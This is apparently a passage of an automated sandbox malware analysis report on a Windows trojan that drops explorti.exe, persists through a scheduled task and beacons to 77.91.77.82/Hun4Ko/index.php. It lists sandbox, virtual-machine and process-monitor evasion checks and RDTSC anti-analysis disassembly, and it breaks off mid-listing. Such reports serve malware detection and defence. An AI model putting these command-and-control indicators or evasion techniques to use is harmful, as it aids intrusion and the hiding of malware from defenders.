                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.77.82
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_003EDFA0 recv,recv,recv,recv,1_2_003EDFA0
                  Source: unknownHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: explorti.exe, 00000001.00000002.4150196753.0000000001034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/
                  Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
                  Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php$
                  Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php2
                  Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php8
                  Source: explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.php?
                  Source: explorti.exe, 00000001.00000002.4150196753.0000000001034000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpKR
                  Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpe

                  System Summary

                  barindex
                  PE file contains section with special chars
                  Source: Jl5yg1Km2s.exeStatic PE information: section name:
                  Source: Jl5yg1Km2s.exeStatic PE information: section name: .idata
                  Source: Jl5yg1Km2s.exeStatic PE information: section name:
                  Source: explorti.exe.0.drStatic PE information: section name:
                  Source: explorti.exe.0.drStatic PE information: section name: .idata
                  Source: explorti.exe.0.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_004230481_2_00423048
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_003EE4101_2_003EE410
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_003E4CD01_2_003E4CD0
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_00417D631_2_00417D63
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_0042763B1_2_0042763B
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_00426EE91_2_00426EE9
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_003E4AD01_2_003E4AD0
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_0042775B1_2_0042775B
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_004287001_2_00428700
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_00422BB01_2_00422BB0
                  Source: Jl5yg1Km2s.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Jl5yg1Km2s.exeStatic PE information: Section: ZLIB complexity 0.9978921191939891
                  Source: Jl5yg1Km2s.exeStatic PE information: Section: cqehubfu ZLIB complexity 0.9945843322554268
                  Source: explorti.exe.0.drStatic PE information: Section: ZLIB complexity 0.9978921191939891
                  Source: explorti.exe.0.drStatic PE information: Section: cqehubfu ZLIB complexity 0.9945843322554268
                  Source: explorti.exe.0.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                  Source: Jl5yg1Km2s.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6bJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Jl5yg1Km2s.exeReversingLabs: Detection: 78%
                  Source: Jl5yg1Km2s.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeFile read: C:\Users\user\Desktop\Jl5yg1Km2s.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Jl5yg1Km2s.exe "C:\Users\user\Desktop\Jl5yg1Km2s.exe"
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: mstask.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: chartv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: atlthunk.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: Jl5yg1Km2s.exeStatic file information: File size 1924608 > 1048576
                  Source: Jl5yg1Km2s.exeStatic PE information: Raw size of cqehubfu is bigger than: 0x100000 < 0x1a4600

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeUnpacked PE file: 0.2.Jl5yg1Km2s.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 6.2.explorti.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW;
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: explorti.exe.0.drStatic PE information: real checksum: 0x1e1da4 should be: 0x1d63c5
                  Source: Jl5yg1Km2s.exeStatic PE information: real checksum: 0x1e1da4 should be: 0x1d63c5
                  Source: Jl5yg1Km2s.exeStatic PE information: section name:
                  Source: Jl5yg1Km2s.exeStatic PE information: section name: .idata
                  Source: Jl5yg1Km2s.exeStatic PE information: section name:
                  Source: Jl5yg1Km2s.exeStatic PE information: section name: cqehubfu
                  Source: Jl5yg1Km2s.exeStatic PE information: section name: gcjpmbpo
                  Source: Jl5yg1Km2s.exeStatic PE information: section name: .taggant
                  Source: explorti.exe.0.drStatic PE information: section name:
                  Source: explorti.exe.0.drStatic PE information: section name: .idata
                  Source: explorti.exe.0.drStatic PE information: section name:
                  Source: explorti.exe.0.drStatic PE information: section name: cqehubfu
                  Source: explorti.exe.0.drStatic PE information: section name: gcjpmbpo
                  Source: explorti.exe.0.drStatic PE information: section name: .taggant
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_003FD82C push ecx; ret 1_2_003FD83F
                  Source: Jl5yg1Km2s.exeStatic PE information: section name: entropy: 7.97975540171384
                  Source: Jl5yg1Km2s.exeStatic PE information: section name: cqehubfu entropy: 7.9529251999211485
                  Source: explorti.exe.0.drStatic PE information: section name: entropy: 7.97975540171384
                  Source: explorti.exe.0.drStatic PE information: section name: cqehubfu entropy: 7.9529251999211485
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJump to dropped file

                  Boot Survival

                  barindex
                  Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Tries to detect sandboxes / dynamic malware analysis system (registry check)
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Tries to detect virtualization through RDTSC time measurements
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: A6F29F second address: A6F2BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: A6F2BF second address: A6EB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F1CC8B8C9F0h 0x0000000e push dword ptr [ebp+122D1585h] 0x00000014 xor dword ptr [ebp+122D1ED3h], edx 0x0000001a call dword ptr [ebp+122D1BDCh] 0x00000020 pushad 0x00000021 jc 00007F1CC8B8C9E7h 0x00000027 clc 0x00000028 xor eax, eax 0x0000002a cmc 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f sub dword ptr [ebp+122D1E72h], edx 0x00000035 mov dword ptr [ebp+122D2B3Bh], eax 0x0000003b mov dword ptr [ebp+122D1E72h], edx 0x00000041 mov dword ptr [ebp+122D2EACh], ebx 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007F1CC8B8C9F9h 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 jmp 00007F1CC8B8C9F4h 0x0000005a stc 0x0000005b lodsw 0x0000005d mov dword ptr [ebp+122D2EACh], edi 0x00000063 sub dword ptr [ebp+122D1E72h], ecx 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jl 00007F1CC8B8C9E7h 0x00000073 clc 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 clc 0x00000079 jp 00007F1CC8B8C9ECh 0x0000007f mov dword ptr [ebp+122D2E13h], edx 0x00000085 nop 0x00000086 push eax 0x00000087 push edx 0x00000088 push edx 0x00000089 pushad 0x0000008a popad 0x0000008b pop edx 0x0000008c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: A6EB20 second address: A6EB36 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1CC8BB7C3Ch 0x00000008 jno 00007F1CC8BB7C36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: A6EB36 second address: A6EB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9EDh 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: A6EB48 second address: A6EB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: A6EB4E second address: A6EB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE7486 second address: BE748C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE748C second address: BE7490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE675A second address: BE6763 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9BF5 second address: BE9BFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9BFA second address: A6EB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 37766346h 0x0000000e push dword ptr [ebp+122D1585h] 0x00000014 movzx edi, bx 0x00000017 call dword ptr [ebp+122D1BDCh] 0x0000001d pushad 0x0000001e jc 00007F1CC8BB7C37h 0x00000024 clc 0x00000025 xor eax, eax 0x00000027 cmc 0x00000028 mov edx, dword ptr [esp+28h] 0x0000002c sub dword ptr [ebp+122D1E72h], edx 0x00000032 mov dword ptr [ebp+122D2B3Bh], eax 0x00000038 mov dword ptr [ebp+122D1E72h], edx 0x0000003e mov dword ptr [ebp+122D2EACh], ebx 0x00000044 mov esi, 0000003Ch 0x00000049 jmp 00007F1CC8BB7C49h 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 jmp 00007F1CC8BB7C44h 0x00000057 stc 0x00000058 lodsw 0x0000005a mov dword ptr [ebp+122D2EACh], edi 0x00000060 sub dword ptr [ebp+122D1E72h], ecx 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a jl 00007F1CC8BB7C37h 0x00000070 clc 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 clc 0x00000076 jp 00007F1CC8BB7C3Ch 0x0000007c mov dword ptr [ebp+122D2E13h], edx 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 push edx 0x00000086 pushad 0x00000087 popad 0x00000088 pop edx 0x00000089 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9C3B second address: BE9C83 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 nop 0x00000018 mov dword ptr [ebp+122D209Dh], edi 0x0000001e push 00000000h 0x00000020 pushad 0x00000021 sub dword ptr [ebp+122D1830h], esi 0x00000027 sub bh, 0000006Fh 0x0000002a popad 0x0000002b mov edx, dword ptr [ebp+122D1EC5h] 0x00000031 call 00007F1CC8B8C9E9h 0x00000036 push eax 0x00000037 push edx 0x00000038 jc 00007F1CC8B8C9ECh 0x0000003e jg 00007F1CC8B8C9E6h 0x00000044 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9C83 second address: BE9CDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jo 00007F1CC8BB7C36h 0x00000012 jne 00007F1CC8BB7C36h 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007F1CC8BB7C44h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 popad 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 pushad 0x00000028 jnc 00007F1CC8BB7C3Ch 0x0000002e pushad 0x0000002f jmp 00007F1CC8BB7C3Dh 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9CDB second address: BE9D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 je 00007F1CC8B8C9F3h 0x0000000e jmp 00007F1CC8B8C9EDh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 jng 00007F1CC8B8C9ECh 0x0000001e pop ecx 0x0000001f pop eax 0x00000020 jmp 00007F1CC8B8C9F7h 0x00000025 push 00000003h 0x00000027 movzx ecx, si 0x0000002a push 00000000h 0x0000002c cmc 0x0000002d mov ch, dl 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F1CC8B8C9E8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b movzx edx, si 0x0000004e movzx edi, si 0x00000051 push 